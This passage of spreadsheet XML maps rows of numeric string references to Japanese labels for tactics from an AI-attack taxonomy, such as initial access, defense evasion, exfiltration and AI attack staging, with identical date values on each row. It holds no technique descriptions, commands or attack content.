      <c r="I38" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="39" ht="60" spans="1:9">
      <c r="A39" s="14" t="s">
        <v>206</v>
      </c>
      <c r="B39" s="15" t="s">
        <v>207</v>
      </c>
      <c r="C39" s="14" t="s">
        <v>878</v>
      </c>
      <c r="D39" s="15" t="s">
        <v>879</v>
      </c>
      <c r="E39" s="16" t="s">
        <v>210</v>
      </c>
      <c r="F39" s="17">
        <v>45769</v>
      </c>
      <c r="G39" s="17">
        <v>45769</v>
      </c>
      <c r="H39" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I39" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="40" ht="30" spans="1:9">
      <c r="A40" s="14" t="s">
        <v>211</v>
      </c>
      <c r="B40" s="15" t="s">
        <v>212</v>
      </c>
      <c r="C40" s="14" t="s">
        <v>880</v>
      </c>
      <c r="D40" s="15" t="s">
        <v>881</v>
      </c>
      <c r="E40" s="16" t="s">
        <v>215</v>
      </c>
      <c r="F40" s="17">
        <v>45769</v>
      </c>
      <c r="G40" s="17">
        <v>45769</v>
      </c>
      <c r="H40" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I40" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="41" spans="1:9">
      <c r="A41" s="14" t="s">
        <v>216</v>
      </c>
      <c r="B41" s="15" t="s">
        <v>217</v>
      </c>
      <c r="C41" s="14" t="s">
        <v>882</v>
      </c>
      <c r="D41" s="19" t="s">
        <v>883</v>
      </c>
      <c r="E41" s="20" t="s">
        <v>220</v>
      </c>
      <c r="F41" s="17">
        <v>45769</v>
      </c>
      <c r="G41" s="17">
        <v>45769</v>
      </c>
      <c r="H41" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I41" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="42" spans="1:9">
      <c r="A42" s="14" t="s">
        <v>221</v>
      </c>
      <c r="B42" s="15" t="s">
        <v>222</v>
      </c>
      <c r="C42" s="14" t="s">
        <v>884</v>
      </c>
      <c r="D42" s="15" t="s">
        <v>885</v>
      </c>
      <c r="E42" s="16" t="s">
        <v>225</v>
      </c>
      <c r="F42" s="17">
        <v>45769</v>
      </c>
      <c r="G42" s="17">
        <v>45769</v>
      </c>
      <c r="H42" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I42" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="43" ht="30" spans="1:9">
      <c r="A43" s="14" t="s">
        <v>226</v>
      </c>
      <c r="B43" s="15" t="s">
        <v>227</v>
      </c>
      <c r="C43" s="19" t="s">
        <v>886</v>
      </c>
      <c r="D43" s="15" t="s">
        <v>887</v>
      </c>
      <c r="E43" s="20" t="s">
        <v>230</v>
      </c>
      <c r="F43" s="17">
        <v>45769</v>
      </c>
      <c r="G43" s="17">
        <v>45769</v>
      </c>
      <c r="H43" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I43" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="44" ht="30" spans="1:9">
      <c r="A44" s="14" t="s">
        <v>231</v>
      </c>
      <c r="B44" s="15" t="s">
        <v>232</v>
      </c>
      <c r="C44" s="14" t="s">
        <v>888</v>
      </c>
      <c r="D44" s="15" t="s">
        <v>889</v>
      </c>
      <c r="E44" s="16" t="s">
        <v>235</v>
      </c>
      <c r="F44" s="17">
        <v>45769</v>
      </c>
      <c r="G44" s="17">
        <v>45769</v>
      </c>
      <c r="H44" s="14" t="str">
        <f>'tactics (ja)'!$C$7&amp;"、"&amp;'tactics (ja)'!$C$11&amp;"、"&amp;'tactics (ja)'!$C$12</f>
        <v>防御策の回避、影響、初期アクセス</v>
      </c>
      <c r="I44" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="45" ht="60" spans="1:9">
      <c r="A45" s="14" t="s">
        <v>237</v>
      </c>
      <c r="B45" s="15" t="s">
        <v>238</v>
      </c>
      <c r="C45" s="14" t="s">
        <v>890</v>
      </c>
      <c r="D45" s="15" t="s">
        <v>891</v>
      </c>
      <c r="E45" s="16" t="s">
        <v>241</v>
      </c>
      <c r="F45" s="17">
        <v>45769</v>
      </c>
      <c r="G45" s="17">
        <v>45769</v>
      </c>
      <c r="H45" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I45" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="46" ht="45" spans="1:9">
      <c r="A46" s="14" t="s">
        <v>243</v>
      </c>
      <c r="B46" s="15" t="s">
        <v>244</v>
      </c>
      <c r="C46" s="19" t="s">
        <v>892</v>
      </c>
      <c r="D46" s="19" t="s">
        <v>893</v>
      </c>
      <c r="E46" s="16" t="s">
        <v>247</v>
      </c>
      <c r="F46" s="17">
        <v>45769</v>
      </c>
      <c r="G46" s="17">
        <v>45769</v>
      </c>
      <c r="H46" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I46" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="47" ht="30" spans="1:9">
      <c r="A47" s="14" t="s">
        <v>248</v>
      </c>
      <c r="B47" s="15" t="s">
        <v>249</v>
      </c>
      <c r="C47" s="19" t="s">
        <v>894</v>
      </c>
      <c r="D47" s="19" t="s">
        <v>895</v>
      </c>
      <c r="E47" s="16" t="s">
        <v>252</v>
      </c>
      <c r="F47" s="17">
        <v>45769</v>
      </c>
      <c r="G47" s="17">
        <v>45769</v>
      </c>
      <c r="H47" s="14" t="str">
        <f>'tactics (ja)'!C12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I47" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="48" ht="30" spans="1:9">
      <c r="A48" s="14" t="s">
        <v>253</v>
      </c>
      <c r="B48" s="15" t="s">
        <v>254</v>
      </c>
      <c r="C48" s="19" t="s">
        <v>896</v>
      </c>
      <c r="D48" s="19" t="s">
        <v>897</v>
      </c>
      <c r="E48" s="16" t="s">
        <v>257</v>
      </c>
      <c r="F48" s="17">
        <v>45769</v>
      </c>
      <c r="G48" s="17">
        <v>45769</v>
      </c>
      <c r="H48" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I48" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="49" ht="60" spans="1:9">
      <c r="A49" s="14" t="s">
        <v>258</v>
      </c>
      <c r="B49" s="15" t="s">
        <v>259</v>
      </c>
      <c r="C49" s="14" t="s">
        <v>898</v>
      </c>
      <c r="D49" s="15" t="s">
        <v>899</v>
      </c>
      <c r="E49" s="16" t="s">
        <v>262</v>
      </c>
      <c r="F49" s="17">
        <v>45769</v>
      </c>
      <c r="G49" s="17">
        <v>45769</v>
      </c>
      <c r="H49" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I49" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="50" ht="45" spans="1:9">
      <c r="A50" s="14" t="s">
        <v>263</v>
      </c>
      <c r="B50" s="15" t="s">
        <v>264</v>
      </c>
      <c r="C50" s="14" t="s">
        <v>900</v>
      </c>
      <c r="D50" s="15" t="s">
        <v>901</v>
      </c>
      <c r="E50" s="16" t="s">
        <v>267</v>
      </c>
      <c r="F50" s="17">
        <v>45769</v>
      </c>
      <c r="G50" s="17">
        <v>45769</v>
      </c>
      <c r="H50" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I50" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="51" ht="90" spans="1:9">
      <c r="A51" s="14" t="s">
        <v>268</v>
      </c>
      <c r="B51" s="15" t="s">
        <v>269</v>
      </c>
      <c r="C51" s="14" t="s">
        <v>902</v>
      </c>
      <c r="D51" s="15" t="s">
        <v>903</v>
      </c>
      <c r="E51" s="20" t="s">
        <v>272</v>
      </c>
      <c r="F51" s="17">
        <v>45769</v>
      </c>
      <c r="G51" s="17">
        <v>45769</v>
      </c>
      <c r="H51" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I51" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="52" spans="1:9">
      <c r="A52" s="14" t="s">
        <v>273</v>
      </c>
      <c r="B52" s="15" t="s">
        <v>274</v>
      </c>
      <c r="C52" s="19" t="s">
        <v>904</v>
      </c>
      <c r="D52" s="19" t="s">
        <v>905</v>
      </c>
      <c r="E52" s="16" t="s">
        <v>277</v>
      </c>
      <c r="F52" s="17">
        <v>45769</v>
      </c>
      <c r="G52" s="17">
        <v>45769</v>
      </c>
      <c r="H52" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I52" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="53" ht="30" spans="1:9">
      <c r="A53" s="14" t="s">
        <v>278</v>
      </c>
      <c r="B53" s="15" t="s">
        <v>279</v>
      </c>
      <c r="C53" s="14" t="s">
        <v>906</v>
      </c>
      <c r="D53" s="15" t="s">
        <v>907</v>
      </c>
      <c r="E53" s="16" t="s">
        <v>282</v>
      </c>
      <c r="F53" s="17">
        <v>45769</v>
      </c>
      <c r="G53" s="17">
        <v>45769</v>
      </c>
      <c r="H53" s="14" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I53" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="54" ht="45" spans="1:9">
      <c r="A54" s="14" t="s">
        <v>283</v>
      </c>
      <c r="B54" s="15" t="s">
        <v>284</v>
      </c>
      <c r="C54" s="14" t="s">
        <v>908</v>
      </c>
      <c r="D54" s="15" t="s">
        <v>909</v>
      </c>
      <c r="E54" s="16" t="s">
        <v>287</v>
      </c>
      <c r="F54" s="17">
        <v>45769</v>
      </c>
      <c r="G54" s="17">
        <v>45769</v>
      </c>
      <c r="H54" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I54" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="55" ht="60" spans="1:9">
      <c r="A55" s="14" t="s">
        <v>288</v>
      </c>
      <c r="B55" s="15" t="s">
        <v>289</v>
      </c>
      <c r="C55" s="14" t="s">
        <v>910</v>
      </c>
      <c r="D55" s="15" t="s">
        <v>911</v>
      </c>
      <c r="E55" s="16" t="s">
        <v>292</v>
      </c>
      <c r="F55" s="17">
        <v>45769</v>
      </c>
      <c r="G55" s="17">
        <v>45769</v>
      </c>
      <c r="H55" s="14" t="str">
        <f>'tactics (ja)'!C8</f>
        <v>探索</v>
      </c>
      <c r="I55" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="56" spans="1:9">
      <c r="A56" s="14" t="s">
        <v>293</v>
      </c>
      <c r="B56" s="15" t="s">
        <v>294</v>
      </c>
      <c r="C56" s="14" t="s">
        <v>912</v>
      </c>
      <c r="D56" s="15" t="s">
        <v>913</v>
      </c>
      <c r="E56" s="16" t="s">
        <v>297</v>
      </c>
      <c r="F56" s="17">
        <v>45769</v>
      </c>
      <c r="G56" s="17">
        <v>45769</v>
      </c>
      <c r="H56" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I56" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="57" ht="60" spans="1:9">
      <c r="A57" s="14" t="s">
        <v>298</v>
      </c>
      <c r="B57" s="15" t="s">
        <v>299</v>
      </c>
      <c r="C57" s="14" t="s">
        <v>914</v>
      </c>
      <c r="D57" s="15" t="s">
        <v>915</v>
      </c>
      <c r="E57" s="16" t="s">
        <v>302</v>
      </c>
      <c r="F57" s="17">
        <v>45769</v>
      </c>
      <c r="G57" s="17">
        <v>45769</v>
      </c>
      <c r="H57" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I57" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="58" ht="30" spans="1:9">
      <c r="A58" s="14" t="s">
        <v>303</v>
      </c>
      <c r="B58" s="15" t="s">
        <v>304</v>
      </c>
      <c r="C58" s="14" t="s">
        <v>916</v>
      </c>
      <c r="D58" s="15" t="s">
        <v>917</v>
      </c>
      <c r="E58" s="16" t="s">
        <v>307</v>
      </c>
      <c r="F58" s="17">
        <v>45769</v>
      </c>
      <c r="G58" s="17">
        <v>45769</v>
      </c>
      <c r="H58" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I58" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="59" ht="60" spans="1:9">
      <c r="A59" s="14" t="s">
        <v>308</v>
      </c>
      <c r="B59" s="15" t="s">
        <v>309</v>
      </c>
      <c r="C59" s="19" t="s">
        <v>918</v>
      </c>
      <c r="D59" s="15" t="s">
        <v>919</v>
      </c>
      <c r="E59" s="16" t="s">
        <v>312</v>
      </c>
      <c r="F59" s="17">
        <v>45769</v>
      </c>
      <c r="G59" s="17">
        <v>45769</v>
      </c>
      <c r="H59" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I59" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="60" spans="1:9">
      <c r="A60" s="14" t="s">
        <v>313</v>
      </c>
      <c r="B60" s="15" t="s">
        <v>314</v>
      </c>
      <c r="C60" s="19" t="s">
        <v>920</v>
      </c>
      <c r="D60" s="19" t="s">
        <v>921</v>
      </c>
      <c r="E60" s="16" t="s">
        <v>317</v>
      </c>
      <c r="F60" s="17">
        <v>45769</v>
      </c>
      <c r="G60" s="17">
        <v>45769</v>
      </c>
      <c r="H60" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I60" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="61" ht="30" spans="1:9">
      <c r="A61" s="14" t="s">
        <v>318</v>
      </c>
      <c r="B61" s="15" t="s">
        <v>319</v>
      </c>
      <c r="C61" s="14" t="s">
        <v>922</v>
      </c>
      <c r="D61" s="19" t="s">
        <v>923</v>
      </c>
      <c r="E61" s="16" t="s">
        <v>322</v>
      </c>
      <c r="F61" s="17">
        <v>45769</v>
      </c>
      <c r="G61" s="17">
        <v>45769</v>
      </c>
      <c r="H61" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I61" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="62" ht="30" spans="1:9">
      <c r="A62" s="14" t="s">
        <v>323</v>
      </c>
      <c r="B62" s="15" t="s">
        <v>324</v>
      </c>
      <c r="C62" s="19" t="s">
        <v>924</v>
      </c>
      <c r="D62" s="19" t="s">
        <v>925</v>
      </c>
      <c r="E62" s="16" t="s">
        <v>327</v>
      </c>
      <c r="F62" s="17">
        <v>45769</v>
      </c>
      <c r="G62" s="17">
        <v>45769</v>
      </c>
      <c r="H62" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I62" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="63" spans="1:9">
      <c r="A63" s="14" t="s">
        <v>328</v>
      </c>
      <c r="B63" s="15" t="s">
        <v>329</v>
      </c>
      <c r="C63" s="19" t="s">
        <v>926</v>
      </c>
      <c r="D63" s="19" t="s">
        <v>927</v>
      </c>
      <c r="E63" s="16" t="s">
        <v>332</v>
      </c>
      <c r="F63" s="17">
        <v>45769</v>
      </c>
      <c r="G63" s="17">
        <v>45769</v>
      </c>
      <c r="H63" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I63" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="64" ht="30" spans="1:9">
      <c r="A64" s="14" t="s">
        <v>333</v>
      </c>
      <c r="B64" s="15" t="s">
        <v>334</v>
      </c>
      <c r="C64" s="19" t="s">
        <v>928</v>
      </c>
      <c r="D64" s="19" t="s">
        <v>929</v>
      </c>
      <c r="E64" s="16" t="s">
        <v>337</v>
      </c>
      <c r="F64" s="17">
        <v>45769</v>
      </c>
      <c r="G64" s="17">
        <v>45769</v>
      </c>
      <c r="H64" s="14" t="str">
        <f>'tactics (ja)'!$C$7&amp;"、"&amp;'tactics (ja)'!$C$14</f>
        <v>防御策の回避、権限昇格</v>
      </c>
      <c r="I64" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="65" ht="75" spans="1:9">
      <c r="A65" s="14" t="s">
        <v>339</v>
      </c>
      <c r="B65" s="15" t="s">
        <v>340</v>
      </c>
      <c r="C65" s="19" t="s">
        <v>930</v>
      </c>
      <c r="D65" s="15" t="s">
        <v>931</v>
      </c>
      <c r="E65" s="16" t="s">
        <v>343</v>
      </c>
      <c r="F65" s="17">
        <v>45769</v>
      </c>
      <c r="G65" s="17">
        <v>45769</v>
      </c>
      <c r="H65" s="14" t="str">
        <f>'tactics (ja)'!$C$9&amp;"、"&amp;'tactics (ja)'!$C$14</f>
        <v>実行、権限昇格</v>
      </c>
      <c r="I65" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="66" ht="45" spans="1:9">
      <c r="A66" s="14" t="s">
        <v>345</v>
      </c>
      <c r="B66" s="15" t="s">
        <v>346</v>
      </c>
      <c r="C66" s="14" t="s">
        <v>932</v>
      </c>
      <c r="D66" s="15" t="s">
        <v>933</v>
      </c>
      <c r="E66" s="16" t="s">
        <v>349</v>
      </c>
      <c r="F66" s="17">
        <v>45769</v>
      </c>
      <c r="G66" s="17">
        <v>45769</v>
      </c>
      <c r="H66" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I66" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="67" ht="105" spans="1:9">
      <c r="A67" s="14" t="s">
        <v>350</v>
      </c>
      <c r="B67" s="15" t="s">
        <v>351</v>
      </c>
      <c r="C67" s="19" t="s">
        <v>934</v>
      </c>
      <c r="D67" s="19" t="s">
        <v>935</v>
      </c>
      <c r="E67" s="16" t="s">
        <v>354</v>
      </c>
      <c r="F67" s="17">
        <v>45769</v>
      </c>
      <c r="G67" s="17">
        <v>45769</v>
      </c>
      <c r="H67" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I67" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="68" ht="45" spans="1:9">
      <c r="A68" s="14" t="s">
        <v>355</v>
      </c>
      <c r="B68" s="15" t="s">
        <v>356</v>
      </c>
      <c r="C68" s="14" t="s">
        <v>936</v>
      </c>
      <c r="D68" s="15" t="s">
        <v>937</v>
      </c>
      <c r="E68" s="16" t="s">
        <v>359</v>
      </c>
      <c r="F68" s="17">
        <v>45769</v>
      </c>
      <c r="G68" s="17">
        <v>45769</v>
      </c>
      <c r="H68" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I68" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="69" ht="30" spans="1:9">
      <c r="A69" s="14" t="s">
        <v>360</v>
      </c>
      <c r="B69" s="15" t="s">
        <v>361</v>
      </c>
      <c r="C69" s="14" t="s">
        <v>938</v>
      </c>
      <c r="D69" s="15" t="s">
        <v>939</v>
      </c>
      <c r="E69" s="16" t="s">
        <v>364</v>
      </c>
      <c r="F69" s="17">
        <v>45769</v>
      </c>
      <c r="G69" s="17">
        <v>45769</v>
      </c>
      <c r="H69" s="14" t="str">
        <f>'tactics (ja)'!$C$13</f>
        <v>永続化</v>
      </c>
      <c r="I69" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="70" ht="210" spans="1:9">
      <c r="A70" s="14" t="s">
        <v>366</v>
      </c>
      <c r="B70" s="15" t="s">
        <v>367</v>
      </c>
      <c r="C70" s="14" t="s">
        <v>940</v>
      </c>
      <c r="D70" s="15" t="s">
        <v>941</v>
      </c>
      <c r="E70" s="16" t="s">
        <v>370</v>
      </c>
      <c r="F70" s="17">
        <v>45769</v>
      </c>
      <c r="G70" s="17">
        <v>45769</v>
      </c>
      <c r="H70" s="14" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I70" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="71" ht="60" spans="1:9">
      <c r="A71" s="14" t="s">
        <v>371</v>
      </c>
      <c r="B71" s="15" t="s">
        <v>372</v>
      </c>
      <c r="C71" s="14" t="s">
        <v>942</v>
      </c>
      <c r="D71" s="15" t="s">
        <v>943</v>
      </c>
      <c r="E71" s="16" t="s">
        <v>375</v>
      </c>
      <c r="F71" s="17">
        <v>45769</v>
      </c>
      <c r="G71" s="17">
        <v>45769</v>
      </c>
      <c r="H71" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I71" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="72" ht="30" spans="1:9">
      <c r="A72" s="14" t="s">
        <v>376</v>
      </c>
      <c r="B72" s="15" t="s">
        <v>377</v>
      </c>
      <c r="C72" s="14" t="s">
        <v>944</v>
      </c>
      <c r="D72" s="15" t="s">
        <v>945</v>
      </c>
      <c r="E72" s="16" t="s">
        <v>380</v>
      </c>
      <c r="F72" s="17">
        <v>45769</v>
      </c>
      <c r="G72" s="17">
        <v>45769</v>
      </c>
      <c r="H72" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I72" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="73" ht="30" spans="1:9">
      <c r="A73" s="14" t="s">
        <v>381</v>
      </c>
      <c r="B73" s="15" t="s">
        <v>382</v>
      </c>
      <c r="C73" s="14" t="s">
        <v>946</v>
      </c>
      <c r="D73" s="15" t="s">
        <v>947</v>
      </c>
      <c r="E73" s="16" t="s">
        <v>385</v>
      </c>
      <c r="F73" s="17">
        <v>45769</v>
      </c>
      <c r="G73" s="17">
        <v>45769</v>
      </c>
      <c r="H73" s="14" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$13</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I73" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="74" ht="30" spans="1:9">
      <c r="A74" s="14" t="s">
        <v>387</v>
      </c>
      <c r="B74" s="15" t="s">
        <v>388</v>
      </c>
      <c r="C74" s="14" t="s">
        <v>948</v>
      </c>
      <c r="D74" s="19" t="s">
        <v>949</v>
      </c>
      <c r="E74" s="16" t="s">
        <v>391</v>
      </c>
      <c r="F74" s="17">
        <v>45769</v>
      </c>
      <c r="G74" s="17">
        <v>45769</v>
      </c>
      <c r="H74" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I74" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="75" ht="30" spans="1:9">
      <c r="A75" s="14" t="s">
        <v>392</v>
      </c>
      <c r="B75" s="15" t="s">
        <v>393</v>
      </c>
      <c r="C75" s="14" t="s">
        <v>950</v>
      </c>
      <c r="D75" s="15" t="s">
        <v>951</v>
      </c>
      <c r="E75" s="16" t="s">
        <v>396</v>
      </c>
      <c r="F75" s="17">
        <v>45769</v>
      </c>
      <c r="G75" s="17">
        <v>45769</v>
      </c>
      <c r="H75" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I75" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="76" ht="30" spans="1:9">
      <c r="A76" s="14" t="s">
        <v>397</v>
      </c>
      <c r="B76" s="15" t="s">
        <v>398</v>
      </c>
      <c r="C76" s="14" t="s">
        <v>952</v>
      </c>
      <c r="D76" s="19" t="s">
        <v>953</v>
      </c>
      <c r="E76" s="20" t="s">
        <v>401</v>
      </c>
      <c r="F76" s="17">
        <v>45769</v>
      </c>
      <c r="G76" s="17">
        <v>45769</v>
      </c>
      <c r="H76" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I76" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="77" ht="90" spans="1:9">
      <c r="A77" s="14" t="s">
        <v>402</v>
      </c>
      <c r="B77" s="15" t="s">
        <v>403</v>
      </c>
      <c r="C77" s="14" t="s">
        <v>954</v>
      </c>
      <c r="D77" s="19" t="s">
        <v>955</v>
      </c>
      <c r="E77" s="16" t="s">
        <v>406</v>
      </c>
      <c r="F77" s="17">
        <v>45769</v>
      </c>
      <c r="G77" s="17">
        <v>45769</v>
      </c>
      <c r="H77" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I77" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="78" ht="45" spans="1:9">
      <c r="A78" s="14" t="s">
        <v>407</v>
      </c>
      <c r="B78" s="15" t="s">
        <v>408</v>
      </c>
      <c r="C78" s="14" t="s">
        <v>956</v>
      </c>
      <c r="D78" s="15" t="s">
        <v>957</v>
      </c>
      <c r="E78" s="16" t="s">
        <v>411</v>
      </c>
      <c r="F78" s="17">
        <v>45769</v>
      </c>
      <c r="G78" s="17">
        <v>45769</v>
      </c>
      <c r="H78" s="14" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$13</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I78" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="79" ht="30" spans="1:9">
      <c r="A79" s="14" t="s">
        <v>412</v>
      </c>
      <c r="B79" s="15" t="s">
        <v>413</v>
      </c>
      <c r="C79" s="19" t="s">
        <v>958</v>
      </c>
      <c r="D79" s="19" t="s">
        <v>959</v>
      </c>
      <c r="E79" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F79" s="17">
        <v>45769</v>
      </c>
      <c r="G79" s="17">
        <v>45769</v>
      </c>
      <c r="H79" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I79" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="80" ht="75" spans="1:9">
      <c r="A80" s="14" t="s">
        <v>417</v>
      </c>
      <c r="B80" s="15" t="s">
        <v>418</v>
      </c>
      <c r="C80" s="14" t="s">
        <v>960</v>
      </c>
      <c r="D80" s="19" t="s">
        <v>961</v>
      </c>
      <c r="E80" s="16" t="s">
        <v>421</v>
      </c>
      <c r="F80" s="17">
        <v>45769</v>
      </c>
      <c r="G80" s="17">
        <v>45769</v>
      </c>
      <c r="H80" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I80" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="81" ht="45" spans="1:9">
      <c r="A81" s="14" t="s">
        <v>422</v>
      </c>
      <c r="B81" s="15" t="s">
        <v>423</v>
      </c>
      <c r="C81" s="14" t="s">
        <v>962</v>
      </c>
      <c r="D81" s="15" t="s">
        <v>963</v>
      </c>
      <c r="E81" s="16" t="s">
        <v>426</v>
      </c>
      <c r="F81" s="17">
        <v>45769</v>
      </c>
      <c r="G81" s="17">
        <v>45769</v>
      </c>
      <c r="H81" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I81" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="82" ht="30" spans="1:9">
      <c r="A82" s="14" t="s">
        <v>427</v>
      </c>
      <c r="B82" s="15" t="s">
        <v>428</v>
      </c>
      <c r="C82" s="19" t="s">
        <v>964</v>
      </c>
      <c r="D82" s="19" t="s">
        <v>965</v>
      </c>
      <c r="E82" s="16" t="s">
        <v>431</v>
      </c>
      <c r="F82" s="17">
        <v>45769</v>
      </c>
      <c r="G82" s="17">
        <v>45769</v>
      </c>
      <c r="H82" s="14" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I82" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="83" ht="45" spans="1:9">
      <c r="A83" s="14" t="s">
        <v>432</v>
      </c>
      <c r="B83" s="15" t="s">
        <v>433</v>
      </c>
      <c r="C83" s="14" t="s">
        <v>966</v>
      </c>
      <c r="D83" s="15" t="s">
        <v>967</v>
      </c>
      <c r="E83" s="16" t="s">
        <v>436</v>
      </c>
      <c r="F83" s="17">
        <v>45769</v>
      </c>
      <c r="G83" s="17">
        <v>45769</v>
      </c>
      <c r="H83" s="14" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$13</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I83" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="84" ht="60" spans="1:9">
      <c r="A84" s="14" t="s">
        <v>437</v>
      </c>
      <c r="B84" s="15" t="s">
        <v>438</v>
      </c>
      <c r="C84" s="14" t="s">
        <v>968</v>
      </c>
      <c r="D84" s="19" t="s">
        <v>969</v>
      </c>
      <c r="E84" s="16" t="s">
        <v>441</v>
      </c>
      <c r="F84" s="17">
        <v>45769</v>
